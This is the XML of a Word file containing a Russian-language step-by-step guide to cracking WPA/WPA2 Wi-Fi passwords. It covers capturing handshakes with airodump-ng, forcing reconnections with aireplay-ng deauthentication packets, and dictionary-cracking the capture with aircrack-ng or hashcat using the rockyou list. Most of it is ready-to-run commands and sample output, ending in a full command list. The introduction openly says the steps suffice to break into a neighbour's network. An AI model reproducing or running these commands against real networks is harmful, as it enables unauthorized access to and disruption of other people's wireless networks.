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B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F47B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</w:pPr>
      <w:r w:rsidRPr="006F47B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Взлом маршрутизаторов WPA/WPA2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F47B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Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F47B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с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4"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  <w:t xml:space="preserve">Airodump-ng </w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B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</w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4"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  <w:t xml:space="preserve"> Aircrack-ng/Hashcat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 краткое пошаговое руководство, которое демонстрирует способ взлома сетей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Wi-Fi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защищённых слабыми паролями. Оно не исчерпывающее, но этой информации должно хватить, чтобы вы протестировали свою собственную сетевую безопасность или взломали кого-нибудь поблизости. Изложенная ниже атака полностью пассивна (только прослушивание, ничего не транслируется с вашего компьютера) и о ней невозможно узнать, если вы только реально не воспользуетесь паролем, который взломали. Необязательную активную атаку с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деаутентификацией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можно применить для ускорения разведывательного процесса. Она описана в конце статьи.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Если вы знакомы с процессом, можете пропустить описания и сразу перейти к списку команд в конце. Разнообразные предложения и альтернативные методы перечислены в </w:t>
      </w:r>
      <w:hyperlink r:id="rId5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приложении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ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данное ПО/руководство предназначено только для образовательных целей. Его нельзя использовать для нелегальной активности. Автор не несёт ответственности за его использование. Не будь уродом.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Для начала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руководство предполагает, что вы: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целом не испытываете проблем с использованием командной строки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F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Работаете в дистрибутиве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базе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Debian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желательно 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"https://www.kali.org/" </w:instrTex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F47B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Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F47B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6F47B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linux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(пользователям OS X см. </w:t>
      </w:r>
      <w:hyperlink r:id="rId6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приложение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6F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F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вас установлен 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"http://aircrack-ng.org/" </w:instrTex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F47B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Aircrack-ng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F47B4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sudo apt-get install aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F4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Ваша карта беспроводной связи поддерживает </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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режим монитора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(см. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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совместимых устройств).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Взлом сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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F47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Режим монитора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Начнём со списка беспроводных интерфейсов, которые поддерживают режим монитора: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airmon-ng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Если вы не видите интерфейсов в списке, то ваша карта не поддерживает режим монитора. :(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Предположим, что название вашего интерфейса wlan0, но используйте настоящее название, если оно отличается от этого. Далее, переведём интерфейс в режим монитора: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airmon-ng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start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wlan0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Запускаем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iwconfig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Теперь вы должны увидеть новый интерфейс монитора (скорее всего,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mon0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или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wlan0mon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F47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Найти цель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Начните прослушивать трансляцию </w:t>
      </w:r>
      <w:hyperlink r:id="rId9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кадров неисправности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окружающих беспроводных маршрутизаторов, используя свой интерфейс монитора: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mon0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Вы должны увидеть примерно такую выдачу.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CH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][ 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Elapsed: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 ][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BSSID              PWR  Beacons    </w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4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#Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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14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91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:F7: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:EB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  OPN              belkin.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e8.guests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14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91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:F7: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:E8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212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  WPA2 CCMP   PSK  belkin.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e8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14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:DB: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A:DB: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WPA2 CCMP        &lt;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length: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14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22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:DB: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A:DB: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 WPA2 CCMP   PSK  steveserro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E:C9:AB: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  WPA2 CCMP   PSK  hackme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00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23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69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:AD:AF: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350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  WPA2 CCMP   PSK  Kaitlin</w:t>
      </w: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's Awesome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06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2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78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2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9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT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BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root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EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca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F47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Захват 4-стороннего рукопожатия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WPA/WPA2 использует </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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4-стороннее рукопожатие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для аутентификации устройств в сети. Неважно, что это значит, но вам нужно захватить одно из этих рукопожатий, чтобы взломать сетевой пароль. Эти рукопожатия происходят каждый раз, когда устройства подключаются к сети, например, когда ваш сосед возвращается домой с работы. Чтобы перехватить рукопожатие, мы направляем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airmon-ng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мониторинга трафика в целевой сети, используя значения канала и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bssid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полученные предыдущей командой.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# replace -c and --bssid values with the values of your target network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-w specifies the directory where we will save the packet capture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airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0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CH  6 ][</w:t>
      </w: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Elapsed: 1 min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][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2017-07-23 16:09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BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS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мы ждём… Как только будет захвачено рукопожатие, вы должны увидеть в правом верхнем углу экрана, рядом с текущим временем что-то вроде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[ WPA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handshake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: bc:d3:c9:ef:d2:67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Если не терпится и вы согласны на активную атаку, то можете заставить устройства в сети заново соединиться, принудительно разъединив их. Для этого им нужно отправить вредоносные пакеты на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деаутентификацию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Это часто приводит к перехвату 4-стороннего рукопожатия. См. раздел об атаке с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деаутентификацией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ниже.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только вы перехватили рукопожатие, нажмите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ctrl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-c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для выхода из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Вы увидите файл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cap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там, где указали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сохранять перехваты (скорее всего, он называется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-01.cap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 Мы используем этот файл перехвата для взлома сетевого пароля. Я люблю менять название файла в соответствии с названием сети, которую мы будем взламывать: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mv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./-01.cap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hackme.cap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F47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Взлом пароля сети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Последний шаг — это взломать пароль, используя перехваченное рукопожатие. Если у вас есть доступ к GPU, </w:t>
      </w:r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настоятельно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рекомендую использовать для взлома пароля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Я создал простой инструмент, с помощью которого использовать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очень легко: он называется </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="006F47B4">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="992298"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>naive-hashcat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Если у вас нет доступа к GPU, то можно воспользоваться различными онлайновыми GPU-сервисами для взлома, вроде </w:t>
      </w:r>
      <w:hyperlink r:id="rId12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GPUHASH.me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или </w:t>
      </w:r>
      <w:hyperlink r:id="rId13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OnlineHashCrack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Можете также попробовать использовать CPU-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брутфорс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помощью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Aircrack-ng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оба метода атаки ниже предполагают относительно простой пользовательский пароль. Большинство маршрутизаторов WPA/WPA2 поставляются с сильными 12-значными случайными паролями, которые большинство пользователей оставляют без изменений (и правильно делают). Если пробуете взломать один из таких паролей, рекомендую использовать словарные файлы </w:t>
      </w:r>
      <w:hyperlink r:id="rId14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Probable-Wordlists WPA-length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Взлом с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F47B4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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 (рекомендуемый метод)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До того, как начать взлом пароля с помощью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нужно конвертировать наш файл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cap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в эквивалентный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формат для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hccapx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Это легко сделать или загрузив файл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.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cap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на </w:t>
      </w:r>
      <w:hyperlink r:id="rId15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https://hashcat.net/cap2hccapx/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или напрямую используя инструмент </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="006F47B4">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="992298"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>cap2hccapx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cap2hccapx.bin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hackme.cap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hackme.hccapx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Затем скачиваем и запускаем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#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download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git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clone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https://github.com/brannondorsey/naive-hashcat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cd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  <w:t xml:space="preserve">#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download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134MB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rockyou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dictionary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curl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-L -o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dicts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/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt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  <w:t xml:space="preserve">#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crack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!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baby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!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crack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!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  <w:t xml:space="preserve"># 2500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is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hash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mode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for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WPA/WPA2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  <w:t>HASH_FILE=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hackme.hccapx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POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh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использует различные </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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словари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18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правила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19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комбинации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hyperlink r:id="rId20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маски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(умный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брутфорс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для проведения атаки. Атака на пароль средней сложности может занять дни или даже месяцы. Взломанный пароль будет сохранён в hackme.pot, так что периодически проверяйте этот файл. Как только пароль взломан, то в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POT_FILE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вы увидите что-то такое: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e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet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Где последние два поля, разделённые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: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представляют собой имя сети и пароль, соответственно.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Если предпочитаете использовать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без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naive-hashcat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то см. </w:t>
      </w:r>
      <w:hyperlink r:id="rId21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эту страницу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Взлом с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F47B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Aircrack-ng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Aircrack-ng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можно использовать для самых простых словарных атак силами CPU. Перед началом атаки нужно получить список слов. Рекомендую использовать известный словарный файл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rockyou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#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download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134MB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rockyou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dictionary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curl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-L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt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Обратите внимание, что если сетевой пароль отсутствует среди слов в файле, то вы его не взломаете.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# -a2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specifies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WPA2, -b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is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BSSID, -w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is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wordfile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br/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aircrack-ng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-a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt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hackme.cap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только пароль взломан, вы увидите в окне терминала сообщение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KEY FOUND!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после которого будет указан пароль в текстовом виде.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                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Aircrack-ng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beta3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[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111040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keys tested (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1017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k/s)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KEY FOUND! [ hacktheplanet ]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Master Key     :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B3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E2 DB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BB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CB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DA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Transient Key  : CB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F8 CE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B2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E9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34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DD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CC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CB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CC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ED DF EC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 EC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 EA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BC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8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E2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A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EAPOL HMAC     :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F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D3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FA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11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17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BA B6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DB </w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4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06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B4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Атака с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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деаутентификацией</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Атака с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деаутентификацией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предполагает отправку поддельных пакетов на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деаутентификацию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вашей машины клиенту, подключенному к сети, которую вы пытаетесь взломать. Эти пакеты включают в себя поддельные адреса "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sender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", так что клиент думает, что они отправлены с настоящих точек доступа. Получив такой пакет, большинство клиентов отключаются от сети и немедленно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переподключаются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обеспечивая вам возможность участвовать в 4-стороннем рукопожатии, если вы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мониторите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помощью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Используйте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для мониторинга конкретной точки доступа (используя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-c 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channel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--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bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> MAC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до тех пор, пока клиент (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STATION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не подключится. Подключенный клиент выглядит примерно так, где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64:BC:0C:48:97:F7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его MAC-адрес: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  6 ][</w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4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Elapsed: 2 mins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][</w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B4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2017-07-23 19:15 </w:t>
      </w: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BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS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BSSID              STATION            PWR   Rate    Lost    Frames  Probe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                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F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F47B4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9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS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оставим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airodump-ng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работать, а сами откроем новое окно консоли. Мы используем команду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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>aireplay-ng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для отправки пакета на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деаутентификацию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жертве, заставляя его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переподключиться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 сети, и будем надеяться на рукопожатие.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 xml:space="preserve"># -0 2 specifies we would like to send 2 deauth packets. </w:t>
      </w:r>
      <w:proofErr w:type="gram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Increase this number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if need be with the risk of noticeably interrupting client network activity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-a is the MAC of the access point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-c is the MAC of the client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aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0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вариант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вы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можете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транслировать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пакеты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деаутентификации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всем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клиентам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вокруг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# not all clients respect broadcast deauths though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aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0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вы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отправили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пакеты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возвращайтесь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процессу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airodump-ng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удачном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стечении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обстоятельств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увидите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справа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вверху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 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[ WPA handshake: 9C:5C:8E:C9:AB:C0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.</w:t>
      </w:r>
      <w:proofErr w:type="gram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вы перехватили рукопожатие и можно начинать взлом пароля сети.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Список команд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Ниже список всех команд, которые нужны для взлома сети WPA/WPA2, по порядку, с минимальным описанием.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t># put your network device into monitor mode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airmon-ng start wlan0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listen for all nearby beacon frames to get target BSSID and channel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airodump-ng mon0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start listening for the handshake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airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0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optionally deauth a connected client to force a handshake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aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0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########## crack password with aircrack-ng... ##########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download 134MB rockyou.txt dictionary file if needed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curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt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crack w/ aircrack-ng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aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap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########## or crack password with naive-hashcat ##########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convert cap to hccapx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cap2hccapx.bin capture/-01.cap capture/-01.hccapx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# crack with naive-hashcat</w:t>
      </w:r>
      <w:r w:rsidRPr="006F47B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ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t>HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh</w:t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Приложение</w:t>
      </w:r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Отзывы на это руководство были такими замечательными, что я добавил советы и дополнительные материалы от участников сообщества в дополнительное </w:t>
      </w:r>
      <w:hyperlink r:id="rId22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приложение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Изучите его, чтобы узнать, как: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Перехватывать рукопожатия и взламывать пароли WPA на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MacOS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/OSX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F4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Перехватывать рукопожатия со всех сетей вокруг с помощью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wlandump-ng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F4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crunch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генерации на лету словарных списков на 100 ГБ и больше</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F4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Подделывать свой MAC-адрес с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F47B4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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006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F47B4" w:rsidRPr="006F47B4" w:rsidRDefault="006F47B4" w:rsidP="006F47B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6F47B4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Авторство</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002729EE" w:rsidRDefault="006F47B4" w:rsidP="006F47B4"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Основная часть информации здесь почерпнута из великолепного </w:t>
      </w:r>
      <w:hyperlink r:id="rId23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 xml:space="preserve">руководства Льюиса </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Энкарнасьона</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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Спасибо также авторам и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мейнтейнерам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Aircrack-ng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Hashcat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Огромная благодарность </w:t>
      </w:r>
      <w:hyperlink r:id="rId24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neal1991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за перевод этого руководства на </w:t>
      </w:r>
      <w:hyperlink r:id="rId25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китайский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Кроме того, благодарим </w:t>
      </w:r>
      <w:hyperlink r:id="rId26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hiteshnayak305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27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enilfodne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28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DrinkMoreCodeMore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29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hivie7510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0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cprogrammer1994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1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0XE4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2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hartzell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3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zeeshanu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4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flennic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5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bhusang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6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tversteeg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7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gpetrousov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38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crowchirp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hyperlink r:id="rId39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Shark0der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с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Reddit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GitHub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которые тоже помогли советами и исправлением опечаток. Если вам интересно узнать о дополнительных вариантах взлома WPA2, почитайте </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="006F47B4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это</w:t>
        </w:r>
      </w:hyperlink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обсуждение на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Hacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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F47B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News</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="002729EE" w:rsidSect="006F4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5F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCB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DB5D5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="944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B4"/>
    <w:rsid w:val="002729EE"/>
    <w:rsid w:val="006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5ED94-EB06-4F3E-925F-0FA59D53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4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6F4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4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47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F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47B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F47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7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F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-symbol">
    <w:name w:val="hljs-symbol"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F47B4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-code">
    <w:name w:val="hljs-code"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F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lesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.onlinehashcrack.com/wifi-wpa-rsna-psk-crack.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=rule_based_attack" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hiteshnayak305" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shark0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shcat.net/wiki/doku.php?id=cracking_wpawpa2" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/flenni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Monitor_mode" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gpuhash.me/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=dictionary_attack" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brannondorsey/wifi-cracking/blob/master/README.zh.md" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zeeshanu" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/crowchi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shcat/hashcat-utils" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=mask_attack" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/user/hivie7510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nondorsey/wifi-cracking/blob/master/appendix.md" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brannondorsey/naive-hashcat" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/neal1991" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hartzell" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gpetrousov" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.ycombinator.com/item?id=14840539" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brannondorsey/wifi-cracking/blob/master/appendix.md" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/cap2hccapx/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/user/DrinkMoreCodeMore" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tversteeg" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.stackexchange.com/questions/17767/four-way-handshake-in-wpa-personal-wpa-psk" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=combinator_attack" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0X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acon_frame" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/berzerk0/Probable-Wordlists/tree/master/Real-Passwords/WPA-Length" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brannondorsey/wifi-cracking/blob/master/appendix.md" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/enilfodne" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cprogrammer1994" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bhusa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2407</Words>
  <Characters>13723</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>114</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company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2018-01-21T14:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-21T14:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>